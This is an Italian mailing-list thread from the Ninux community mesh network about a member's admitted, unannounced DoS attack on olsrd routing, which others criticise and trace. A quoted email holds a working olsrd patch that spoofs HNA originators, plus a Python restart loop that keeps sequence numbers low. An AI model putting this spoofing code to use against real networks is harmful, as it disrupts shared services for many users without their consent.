Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-27 Per discussione Saverio Proto
 Praticamente Ninux era sotto attacco ma nessuno ha detto una parola.

 Non il proprietario del nodo, non l'attaccante (che era interno), ma
 neanche chi i disservizi li ha subiti. Io stesso quando ho visto che il
 servizio non era raggiungibile ho pensato Nooo, non posso contattare
 ute...@jabber.ninux.org! Va be' risolveranno, non è un problema mio.

GRAZIE DAVID

il mio attacco DoS non era per attaccare OLSR, che lo so gia che è
buggato, ma era per attaccare la community e far vedere che NON STIAMO
FUNZIONANDO !

vedo che almeno tu lo hai capito :)

Saverio
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-27 Per discussione Pierluigi Checchi
Non è vero, stiamo funzionando benissimo.

Sul tetto di casa mia al mare ti abbiamo tanato in 10 minuti.

:-)




2014-05-27 9:30 GMT+02:00 Saverio Proto ziopr...@gmail.com:

  Praticamente Ninux era sotto attacco ma nessuno ha detto una parola.
 
  Non il proprietario del nodo, non l'attaccante (che era interno), ma
  neanche chi i disservizi li ha subiti. Io stesso quando ho visto che il
  servizio non era raggiungibile ho pensato Nooo, non posso contattare
  ute...@jabber.ninux.org! Va be' risolveranno, non è un problema mio.

 GRAZIE DAVID

 il mio attacco DoS non era per attaccare OLSR, che lo so gia che è
 buggato, ma era per attaccare la community e far vedere che NON STIAMO
 FUNZIONANDO !

 vedo che almeno tu lo hai capito :)

 Saverio
 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 http://ml.ninux.org/mailman/listinfo/wireless

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Luca Cappelletti
2014-05-26 0:35 GMT+02:00 Saverio Proto ziopr...@gmail.com:

 Mitici :)
 Files php rimasti li a marcire perché il plugin era disabilitato :) ma
 cmq una minaccia. Ho fixato,anche perché era vulnerabile anche il sito
 di Ciemmona.

 Ho fixato ;)

 Dai logs ho beccato la vostra scansione. Usate un tool immagino. Ho
 visto che prova un sacco di plugins noti. Quale tool usate?

 bella !


da paura il tuo test cieco...
il problema non è la capacita del singolo nodo di creare delirio...ma la
capacita dell'intera rete di reagire prontamente ed aggirare il nodo
buggato in quanto per principio la rete aggira la censura (in questo caso
la saturazione che inibisce)
per questo ci vuole cooperazione e consapevolezza...tutta roba che andrebbe
codificata in qualche helper di rete che sta sui stessi nodi
mi spiace per chi si è incarognito...è amore anche quello
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Saverio Proto
 * non ci mette al riparo da uno *veramente motivato a creare problemi*
 che potrebbe andare in giro con un nodo a batteria e attaccare da punti
 diversi

Gia... anche perché inutile farsi tutte ste pippe sulle reti contro
l'NSA che ci intercetta e contro i poteri forti.

Se questi poteri forti hanno il potere di isolare pezzi di Internet
tra le nazioni (Twitter in Turchia), hanno anche il potere di pagare
due indiani che vanno in giro per Roma con un camioncino pieno di
antenne e batterie.

Sbaglio ?

Saverio
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Gioacchino Mazzurco
On Monday 26 May 2014 11:22:04 Alessio wrote:
 On 26/05/2014 10:59, Saverio Proto wrote:
  Gia... anche perché inutile farsi tutte ste pippe sulle reti contro
  l'NSA che ci intercetta e contro i poteri forti.

Sul punto NSA secondo me le reti comunitarie hanno del potenziale, magari se 
invece di usare SAMBA, cominciamo a usare tools piu' orientati alla comunita` 
e ai rapporti di fiducia, non diventa piu' cosi' facile mettersi li a 
intercettare...

Per i poteri forti e' una altro discorso, pero' la consapevolezza su come 
funzionano le tecnologie e su come poterle usare anche in certi casi 
aiuterebbe e non poco...


 Al warmup a Bologna una persona ha chiesto a Leonardo se c'era un modo
 di cifrare il traffico di segnalamento e di proteggersi da questo tipo
 di attacchi.
 
 La risposta di Leonardo (cerco di ricordare più o meno) è stata che
 esistono i plugin per farlo, magari non funzionano bene o magari sì,
 però alla fine è una questione di compromesso.

Su bmx6 Axel sta proprio sviluppando una roba di cifratura comunitaria che ha 
spiegato in un qualche talk, e che servirebbe anche in questi casi


 Se stai in un paese con
 un regime oppressivo te ne fai poco della cifratura. Quelli vedono da
 dove parte il segnale e vengono con le armi a casa tua. A quel punto la
 crittografia non ti proteggerà dalle pallottole :(

Be si spera anche che in un paese dal regime oppressivo si sviluppino anche 
altri tipi di pratiche, e che magari ci si potrebbe pure dare una mano con le 
reti comunitarie e la crittografia, penso che le reti comunitarie in quelle 
situazioni assumano altri ruoli e altre forme...


 Il punto della rete comunitaria, almeno in Italia, secondo me è quello
 di avere una maggiore consapevolezza in termini di privacy e possesso
 della rete come bene comune. Di fatto questo ti fa sfuggire un po' di
 più dalle maglie del tecnocontrollo, però per ora è utopico dire che una
 WCN ti protegge dai poteri forti.

Chiaro per il momento per fortuna non c'e' la necessita di proteggersi dalle 
pallottole installando un'antenna, pero' far parte di una rete comunitaria, si 
spera che faccia sviluppare quegli anticorpi di consapevolezza, che servono 
per riconoscere tutti quei segnali che indicano se si sta andando in una 
brutta direzione (censura, tecnocontrollo etc etc) e che magari ti fanno 
accorgere si spera non troppo tardi di brutte pieghe e di correre ai ripari 
con le antenne e con i denti...

Pero' e' chiaro che non bastano le antenne ;)
 

 La consapevolezza è il primo passo, se le persone non sono nemmeno a
 conoscenza del problema (o non lo percepiscono come tale) non c'è niente
 da fare.

Siamo d'accordissimo


 Detto questo: è evidente che una rete come la nostra non può essere a
 prova di tutto. Però ha senso cercare di individuare un certo tipo di
 minacce da cui proteggersi e cercare di capire assieme come fare a farlo.

Non esistono reti a prova di tutto, ma saperne a pacchi di come funzionano e' 
un gran vantaggio ;)

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Enrico Bassetti

Il 25/05/2014 15:33, lilo ha scritto:

non voglio nemmeno immaginare un VERO attacco cosa avrebbe
provocato.. TE?


Nulla toglie che non sarebbe guastata (anzi sarebbe quasi dovuta) una 
comunicazione del tipo hei il giorno X farò dei test per verificare la 
sicurezza della rete, quindi se vedete problemi sono io.


Bastava una frase così per evitare tutto il flame che si sta facendo a 
riguardo. Senza nulla togliere alla sicurezza, a cui sicuramente teniamo 
tutti.


Non credo che se avessi per gioco attaccato la macchina di Saverio e 
mandata in crash diverse volte, lui sarebbe stato più contento. O sbaglio?


Enrico
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione lilo
Il 26/05/2014 16:11, Enrico Bassetti ha scritto:
 Il 25/05/2014 15:33, lilo ha scritto:

..
 Bastava una frase così per evitare tutto il flame che si sta facendo a
 riguardo. Senza nulla togliere alla sicurezza, a cui sicuramente teniamo
 tutti.

ERA gia' stato gia' scritto tutto in proposito mi pare, e Saverio ha
fornito la sua motivazione. per citare mutek, incarognirsi mi pare inutile.

facendo un discorso at large, per quanto MI riguarda, ora che la rete
sta crescendo, ed era quello che si sperava da tanto, l'ottica dovrebbe
concentrarsi in ambito di ingegneria sociale, l'utente deve essere
protetto e vivere tranquillo.

mi pare evidente che non tutti sono informatici skillosi, e quindi la
cosa va districata in modo possibilmente amorevole per tutti.
vedi si-forum-no-forum.

ho la sensazione che alla base ci sia stato un modo anarchico lato
gestione, agire in totale liberta', che ha determinato l'uso di 2
SOFTWARE, openwrt e olsrd.

per me e' sbagliato. anzi, sbagliatissimo.

sarebbe l'ora di creare dei gruppi gestionali per il quantum,
intercambiabili a tempo, in modo democratico.

e che diano linee guida PRECISE per la community.

l'anarchia del fare non funziona forse, non e' adatta a questo tipo di
community, che non e' che fa i corsi di uncinetto, e non va scambiata
con liberta'.

un bofh e' sempre esistito, in informatica.
admins per la gestione delle macchine server, un gruppo pentester che
verifichi la robustezza della rete lato difesa della privacy, ed
eventuali attacchi dal lamerone impazzito distruttivo (ce ne sono
migliaia in giro), gruppo farm, hardweristi, gruppo web/comunicazione,
ETC.

sto andando a braccio eh.. ecco, credo che serva un minimo di
organizzazione.

ninux non e' solo una rete a se stante, se esce nella infernet.

io faccio un lavoro per cui ho segreto professionale e mazzi vari da
difendere/proteggere. non so se si capisce il senso di allarme che provo
quando DEVO interagire con le cazzate Degli Altri, prima fra tutti Sogei
e i server INPS che vanno in pappa ogni volta che devo fare invio
Uniemens. e mettiamoci i software solo per WINDOWS.

insomma, in Italia siamo allo stato brado, cultura digitale quasi
inesistente, ninux e' un qualcosa di prezioso che puo' fare la differenza.

le persone UP ci sono, pensavo di aprire in pad con proposte ma mi e'
partito il periodo redditi cud bilanci etc., non ce la posso fare ora.

ma conosco ninux (e le persone) dal 2006. sono certissima che con calma,
e con i sorrisi, tutto sia non solo risolvibile, ma proprio migliorabile.

ciao.




-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Leonardo
On 05/26/2014 07:00 PM, lilo wrote:
 
 facendo un discorso at large, per quanto MI riguarda, ora che la rete
 sta crescendo, ed era quello che si sperava da tanto, l'ottica dovrebbe
 concentrarsi in ambito di ingegneria sociale, l'utente deve essere
 protetto e vivere tranquillo.

lilo, noi non abbiamo utenti. abbiamo membri della comunità.

 ho la sensazione che alla base ci sia stato un modo anarchico lato
 gestione, agire in totale liberta', che ha determinato l'uso di 2
 SOFTWARE, openwrt e olsrd.

non è cosi'. C'e' chi usa ancora airos, chi usa batman ecc..
l'importante è rispettare le interfacce.

 un bofh e' sempre esistito, in informatica.
 admins per la gestione delle macchine server, un gruppo pentester che
 verifichi la robustezza della rete lato difesa della privacy, ed
 eventuali attacchi dal lamerone impazzito distruttivo (ce ne sono
 migliaia in giro), gruppo farm, hardweristi, gruppo web/comunicazione,
 ETC.

Che ci siano dei gruppi di persone esperte che fanno da riferimento per
certe cose, ben venga. Per me possono avere anche un nome. Ma BOFH è
sempre esistito perchè fino ad ora tutte le reti ne hanno avuto bisogno.
Queste reti sono le prime che possono sopravvivere senza. Anzi, la
tecnologia che sta alla base permette alla rete di vivere senza una
gerarchia. Se te crei il ruolo del BOFH, quando quello se ne va, la rete
muore.

 sto andando a braccio eh.. ecco, credo che serva un minimo di
 organizzazione.

dobbiamo decidere come prendere le decisioni comuni, questo si.

 ma conosco ninux (e le persone) dal 2006. sono certissima che con calma,
 e con i sorrisi, tutto sia non solo risolvibile, ma proprio migliorabile.

su questo siamo d'accordo :-)

leonardo.
-- 
www.leonardo.ma / twitter: @leobowski
gpg Key ID: AABE2BD7
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione NetSoul

On 26/mag/2014, at 19:56, Leonardo m...@leonardo.ma wrote:
 
 Che ci siano dei gruppi di persone esperte che fanno da riferimento per
 certe cose, ben venga. Per me possono avere anche un nome. Ma BOFH è
 sempre esistito perchè fino ad ora tutte le reti ne hanno avuto bisogno.
 Queste reti sono le prime che possono sopravvivere senza. Anzi, la
 tecnologia che sta alla base permette alla rete di vivere senza una
 gerarchia. Se te crei il ruolo del BOFH, quando quello se ne va, la rete
 muore.
 

ma insieme al BOFH non c’era anche un ragazzo brufoloso?

NetSoul



signature.asc
Description: Message signed with OpenPGP using GPGMail
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione lilo
Il 26/05/2014 19:56, Leonardo ha scritto:
 On 05/26/2014 07:00 PM, lilo wrote:

...

 lilo, noi non abbiamo utenti. abbiamo membri della comunità.

seee ciao core [cit.]:D

so cosa e' ninux. te invece sai cos'e' ingegneria sociale?

io parlo lato sicurezza della rete ninux (comune ad un tot di persone
sparpajate per la penisola) e quindi al suo buon funzionamento:

OVVIAMENTE quando parlo di utenti intendo membri della community che
CMQ sono _persone_,  tutte diverse tra loro.

MA.
- c'e' chi si fa arrivare l'hardware team che gli fa tutto, e usufruisce
solamente dei servizi in modo passivo. perche' questo sono, poi che se
famo na magnata al posto del rapportino la sostanza mica cambia.. e' in
aiutoaiuto, ma sempre un servizio.

- c'e' chi si sa fare le cose da solo e usufruisce dei servizi in modo
attivo e partecipe.

tra queste 2 tipologie c'e' un abisso, ne convieni?

quindi? non si fa linkare chi non sa un cazzo di informatica?

nope. e'/vuole essere una rete comunitaria!

sto solo puntanto al fatto che uno straccio di organizzazione,
INTERCAMBIABILE a tempo, che detti linee guida precise, che sia vigile
sul buon funzionamento del tutto, ci dovrebbe essere.

ma unicamente perche' la rete e' CRESCIUTA, tanto, e in modo totalmente
anarchico, ie.: ognuno si fa i cazzi suoi e mette su il nodo come gli pare.

potrebbero essere piccoli gruppi che si accollano periodicamente il
buon andamento del tutto..

perche' se uno buca un nodo, e da li' entra in un altro e poi un altro e
arriva al mio e mi sniffa cazzi miei, questo e' un problema.

ed e' il meno catastrofico del panorama paranoico generale :)
.. senza arrivare all NSA

 non è cosi'. C'e' chi usa ancora airos, chi usa batman ecc..
 l'importante è rispettare le interfacce.

eh appunto :) ma come vedi non e' sufficiente. non basta rispettare le
interfacce, se poi questo crea un altro disagio, o un pericolo per la
collettivita'. o community, per dirla EN.

oh poi io sto solo pensando ad una soluzione che potrebbe essere
risolutiva per l'*inclusivita*', senza arrivare all'out-out di Saverio.
che sta di fatto provocando la medesima discussione ;)

che poi l'hardware-team gia' esiste.. pensa te.

e mi pare pure ovvio che questi paletti li stia mettendo proprio chi
la rete l'ha sognata, pensata, studiata, e pure bootstrappata.

e' un po' come avere un figlio, porcapupazza :D

si percepisce ingiusta questa posizione? OK. allora creiamo gruppi che
hanno la facolta'/incombenza di dirimere il traffico community

cosi' almeno si sa chi ci sta lavorando e dedicando, si sa a chi
rivolgersi in caso di casini, etc.

poi oh... idee in movimento eh. l'unica regola e' non avere regole.

mi verrebbe pure da dire: Darwin fai il tuo corso. in Proto-style :)

 gerarchia. Se te crei il ruolo del BOFH, quando quello se ne va, la rete
 muore.

non ho scritto voglio un Bofh tsss :D

inZomma. c'e' una bella differenza tra una rete di 100 nodi, tutti
amici, tutti agheri skillosi, (ora tutti SENIOR :)) e una di 1000/10.000
e oltre shakehumanity.

curiosa di Guifi, loro come si comportano in proposito? sono 24.000+ nodi..

ciao.

-- 
lilo
Don't worry; it's been deprecated. The new one is worse.



0x10318C92.asc
Description: application/pgp-keys
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Leonardo
On 05/26/2014 11:44 PM, lilo wrote:

 lilo, noi non abbiamo utenti. abbiamo membri della comunità.
 
 seee ciao core [cit.]:D
 
 so cosa e' ninux. te invece sai cos'e' ingegneria sociale?

un po'.

 
 io parlo lato sicurezza della rete ninux (comune ad un tot di persone
 sparpajate per la penisola) e quindi al suo buon funzionamento:

e allora saprai anche che il lato sicurezza della rete ninux al momento
fa schifo al maiale... per usare un termine tecnico.

 
 OVVIAMENTE quando parlo di utenti intendo membri della community che
 CMQ sono _persone_,  tutte diverse tra loro.
[...]
 
 quindi? non si fa linkare chi non sa un cazzo di informatica?
 
 nope. e'/vuole essere una rete comunitaria!

appunto. c'e' bisogno di partecipazione, altrimenti non è comunitaria.

 perche' se uno buca un nodo, e da li' entra in un altro e poi un altro e
 arriva al mio e mi sniffa cazzi miei, questo e' un problema.
 
 ed e' il meno catastrofico del panorama paranoico generale :)
 .. senza arrivare all NSA

l'NSA a noi ci si beve quando vuole, e pure la postale e pure il niubbo.
E se qualcuno di ninux domani decide di far smettere di funzionare
tutto, basta qualche pacchetto forgiato bene. se ti vuoi preoccupare,
preoccupati.

 
 non è cosi'. C'e' chi usa ancora airos, chi usa batman ecc..
 l'importante è rispettare le interfacce.
 
 eh appunto :) ma come vedi non e' sufficiente. non basta rispettare le
 interfacce, se poi questo crea un altro disagio, o un pericolo per la
 collettivita'. o community, per dirla EN.

Io penso che non ci sia alcuna idea di sicurezza in ninux. l'unica idea
attualmente presente è che la rete è libera, nessuno ti impedisce di
usare gli strumenti che vuoi con chi vuoi per proteggere quello che
vuoi. Oltre a questo, la rete non è di nessuno, quindi non c'e' una
singola persona a cui l'NSA di turno può mandare la letterina chiedendo
i dati di tutti. Tutto sommato non è poco, ma tutto il resto è spazio
per migliorare. D'altronde, fa funzionare una rete mesh è già abbastanza
difficile per chi non è paranoico.

 che poi l'hardware-team gia' esiste.. pensa te.

esiste a Roma, perchè (immagino) è gente brava che ha voglia di uscire
la domenica alle 8 per montare i nodi di altri. Se ci sono persone cha
hanno voglia di fare il security-team e guadagnarsi la fiducia del resto
della comunità, avanti!

 inZomma. c'e' una bella differenza tra una rete di 100 nodi, tutti
 amici, tutti agheri skillosi, (ora tutti SENIOR :)) e una di 1000/10.000
 e oltre shakehumanity.

penso che alla fine se semo capiti, e che non la vediamo tanto
diversamente.

 curiosa di Guifi, loro come si comportano in proposito? sono 24.000+ nodi..

io ci parlo spesso. E, alla fine, non sono messi meglio di noi. Cercano
di sviluppare un unico SO, ed un unico protocollo di routing, (ma poi ci
sono tante eccezioni) pezzi in ad-hoc, pezzi in infrastruttura, ecc. dal
punto di vista della sicurezza per quel che so non stanno messi tanto
meglio, se non che usano bmx che implementa delle primitive di
crittografia già nel routing. Se vuoi chiedo.

ciao,
leonardo.
-- 
www.leonardo.ma / twitter: @leobowski
gpg Key ID: AABE2BD7
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione Leonardo
On 05/27/2014 12:22 AM, Leonardo wrote:
 On 05/26/2014 11:44 PM, lilo wrote:

PS: non ho messo smiletti in giro perchè la punteggiatura emoticona non
è il mio forte, ma insomma, si capisce che il tono è rilassato :-)

leonardo.


-- 
www.leonardo.ma / twitter: @leobowski
gpg Key ID: AABE2BD7
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione David Costa
On 05/26/2014 07:00 PM, lilo wrote:
 facendo un discorso at large, per quanto MI riguarda, ora che la rete
 sta crescendo, ed era quello che si sperava da tanto, l'ottica dovrebbe
 concentrarsi in ambito di ingegneria sociale, l'utente deve essere
 protetto e vivere tranquillo.

Ammetto che l'esperimento di Saverio è un po' brusco e autistico, e
ammetto anche di non conoscere i nodi e le vicissitudini di Roma, però
mette bene in evidenza quanto sia importante assumere certi comportamenti.

Qualcuno ha fatto un attacco esattamente come procederebbe un attaccante
reale, sfruttando vulnerabilità note e non corrette, prendendo come
target dei servizi usabili anche dall'esterno. L'attacco è pure lungo
temporalmente e genera diversi mal di testa a proprietari di nodi,
utenti interni ed esterni a Ninux.

Praticamente Ninux era sotto attacco ma nessuno ha detto una parola.

Non il proprietario del nodo, non l'attaccante (che era interno), ma
neanche chi i disservizi li ha subiti. Io stesso quando ho visto che il
servizio non era raggiungibile ho pensato Nooo, non posso contattare
ute...@jabber.ninux.org! Va be' risolveranno, non è un problema mio.

Per evitare l'ingegneria sociale un modo sarebbe quello di riverificare
le informazioni, chiedendo sono sotto attacco o qualcuno ha cambiato
qualcosa nei suoi apparati? ragà ma il servizio non va perché lo state
aggiornando oppure è esploso qualcosa nel routing BGP?
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-26 Per discussione lilo
Il 27/05/2014 00:26, Leonardo ha scritto:
 On 05/27/2014 12:22 AM, Leonardo wrote:
 On 05/26/2014 11:44 PM, lilo wrote:
 
 PS: non ho messo smiletti in giro perchè la punteggiatura emoticona non
 è il mio forte, ma insomma, si capisce che il tono è rilassato :-)

ci mancherebbe.

tralaltro ho realizzato solo ora che te sei leobowski

/me stordita :D

-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu




0x10318C92.asc
Description: application/pgp-keys
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Alessandro Gnagni
Appunto. Inoltre non c'è una soluzione.
Hai creato un bug senza però fornire una cura.
Più che uno scherzo è un comportamento criminale.
Il 25/mag/2014 10:15 Netsoul hackerrede...@outlook.com ha scritto:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA512

 Una volta queste cose venivano organizzate. Certo, il gestore non doveva
 conoscere la metodologia, ma almeno l'arco temporale in cui si sarebbero
 svolti i pentest. Almeno a me così hanno insegnato. Farlo al buio  e poi
 vantarsi di averlo deliberatamente fatto vuol dire aver  mettesso in
 difficoltà persone che magari proprio in quell'arco temporale avevano
 bisogno della rete o più semplicemente stavano cercando di risolvere
 piccoli bug (che poi non capisci se è stato il tuo bug a fottere la rete o
 la rete che fotte te)
 Boh, forse sbaglio io eh! Ma ai miei tempi  se volevi fare una cosa
 fatta bene e professionale avvisavi e poi postavi l'eventuale dump a
 beneficio di tutti...
 Netsoul


  Il 25/mag/2014 01:03 Saverio Proto ziopr...@gmail.com ha scritto:
 
  Ciao,
 
  Metto in Cc: anche wireless@ml.ninux.org perché questa email
 contiene
  informazioni tecniche interessanti.
 
  bravi, avete risolto il problema in fretta :) Ho volutamente provato
  un attacco DoS sul backbone per capire che effetto poteva avere.
 
  ecco la patch di olsrd con cui generavo l'attacco DoS
 

 - -- Inviato dal mio cellulare Android con K-9 Mail.
 -BEGIN PGP SIGNATURE-
 Version: APG v1.1.1

 iQFBBAEBCgArBQJTgaYyJBxOZXRTb3VsIDxoYWNrZXJyZWRlbnRpQG91dGxvb2su
 Y29tPgAKCRDuE4w04YrhfHwiB/kBXMdNd5CT26oDFn3Hz0hHKQPew/rNiJyaevON
 oeCJcXKU+giY1vmBjr0Y6xS5sOqbwTElvEpI5M4baHlysTG9FuBkAPd+j2AloiuV
 FE4IkbqSCtawO8d7MjPdHdt3JxFIRlEr0p576fPFhyiKzR1QQtsITA4C0qZXL1NA
 l7eC32twCGIfiB6/GTnuMJMWfDSoDMzVwLxDIXjAhnoOdfy7UJOtQx9C6dLVA47b
 esx7rymWrO3Lyv1krDt8wFMOxZD9chn4+qoUb2t1XyfwGfeMEwuboFlufadpZGcm
 bXxU/1Nk/EtFcX72k1F6sJJRLqgvVLSJSl0YpufkE4sd51zk
 =Cnhl
 -END PGP SIGNATURE-

 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 http://ml.ninux.org/mailman/listinfo/wireless

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Alessandro (aka ArkaNet)
Hola!

Fish hai ragione dobbiamo fare qualcosa!!
Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
macellaio utilizzare un coltello.
Cosa dovremmo aver acquisito alla luce di ciò?
Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
strage!

Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
(e capacità) può farci male.
I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
sicuramente non avvisino prima di agire!
Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
bestemmiare, insomma ... non si fa ;)

Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
costruircela. A volte non basta fare il link migliore per poter dire di
avere una struttura solida.
Abbiamo anche bisogno di un motore che spinga!

E poi ricordiamoci che ninux fa rima con relax!

Io direi fortuna che era un'azione controllata! (e fatta apposta per
essere controllabile)

Bella  Buona Domenica @tutti

*--
Arka*



Il giorno 25 maggio 2014 09:37, Andrea Pescetelli 
andrea.pescete...@gmail.com ha scritto:

 Ciao
 Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
 e comportamenti che da una settimana stanno invalidando sia il rispetto
 reciproco sia il buon finzionamento della rete stessa da parte di Saverio
 Proto.
 Il 25/mag/2014 09:07 Alessandro Gnagni alessan...@gnagni.it ha
 scritto:

 Non è qualche ora. Va avanti da giovedì mattina.
 Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
 Jabber è stato ko da giovedì per sta cosa.
 Il 25/mag/2014 01:03 Saverio Proto ziopr...@gmail.com ha scritto:

 Ciao,

 Metto in Cc: anche wireless@ml.ninux.org perché questa email contiene
 informazioni tecniche interessanti.

 bravi, avete risolto il problema in fretta :) Ho volutamente provato
 un attacco DoS sul backbone per capire che effetto poteva avere.

 ecco la patch di olsrd con cui generavo l'attacco DoS

 diff --git a/src/build_msg.c b/src/build_msg.c
 index 109f955..e252981 100644
 --- a/src/build_msg.c
 +++ b/src/build_msg.c
 @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
m = (union olsr_message *)msg_buffer;

/* Fill header */
 -  m-v4.originator = olsr_cnf-main_addr.v4.s_addr;
 +  struct in_addr fakesource;
 +  fakesource.s_addr = 0;
 +  //inet_hton(2956867021,fakesource);
 +  inet_aton(172.16.40.40,fakesource);
 +  m-v4.originator = fakesource.s_addr;
m-v4.hopcnt = 0;
m-v4.ttl = MAX_TTL;
m-v4.olsr_msgtype = HNA_MESSAGE;


 una domanda,

 se avessi patchato anche:

 m-v4.hopcnt = XXX

 mettendo numeri casuali..

 sarebbe stato altrettanto facile capire chi è che iniettava questi
 messaggi ?

 mi sto divertendo parecchio con questi attacchi DoS, sono molto
 istruttivi. Per chi vuole giocare insieme a me a programmare in C
 possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
 che vorrei provare è DrDoS su snmp).

 un problema di questo attacco sono cmq i sequence number. Per rendere
 l'attacco efficace ho dovuto far andare la mia instanza patchata di
 OLSR a singhiozzo:

 import os
 import time

 while True:
 os.system(olsrd)
 print started\n
 time.sleep(120)
 os.system(killall olsrd)
 print killed\n
 time.sleep(300)

 in quanto avevo bisogno che i miei sequence number dovevano sempre
 essere piu bassi di quelli del spoofato, altrimenti venivano scartati
 come out of sequence.

 vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
 parte di come ti costruisce l'attacco e voi la parte di come avete
 fatto ad identificare il nodo spoofato ?

 ho staccatto il nodo attaccante, il gioco è finito :)

 ah... vi prego nessun malumore per qualche oretta di disservizi, this
 is Ninux. Si fanno queste cose perché ci si diverte insieme.

 ciao :)

 Saverio

 Il 24 maggio 2014 23:23, Andrea Pescetelli
 andrea.pescete...@gmail.com ha scritto:
  Saverio,
  Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
 hna
  con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
  proveniente dal nodo in oggetto.
 
  Questo problema sta oscurando diversi servizi di ninux in farm
 appartenenti
  a quella subnet.
 
  Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
  multipli.
  puoi verificare?
 
  Grazie
 
  Fish, Hispanico, Halino
  --
  Andrea Pescetelli aka Fish
  Skype: andrea5742
  Ninux int: 5001/5002
  Mobile: +39 3891156050
 
 
 
 


 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 http://ml.ninux.org/mailman/listinfo/wireless


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Andrea Pescetelli
Non è sminuendo la cosa che si risolve il problema.
Dove andare a colpire in un azione premeditata?
I servizi di tutti perchè ZioProto se ne frega della chat dove gli altri
fanno gsoc e scambiano opinioni.
Dove? Nella Farm che lui stesso non approva e guarda caso dove ci sta anche
casa mia dove forse per qualche motivo in un futuro avrebbe potuto girarci
anche il blog che gyardacaso non approva.
Quale subnet? La pubbica della farm e perchè non quella dove ci sta anche
il mail server di Nino?
Quale target? Una macchina guarda caso di casa al mare di Pierluigi che
abbiamo sostituito giovedi' insieme ad altre 3 perchè seccate da un fulmine
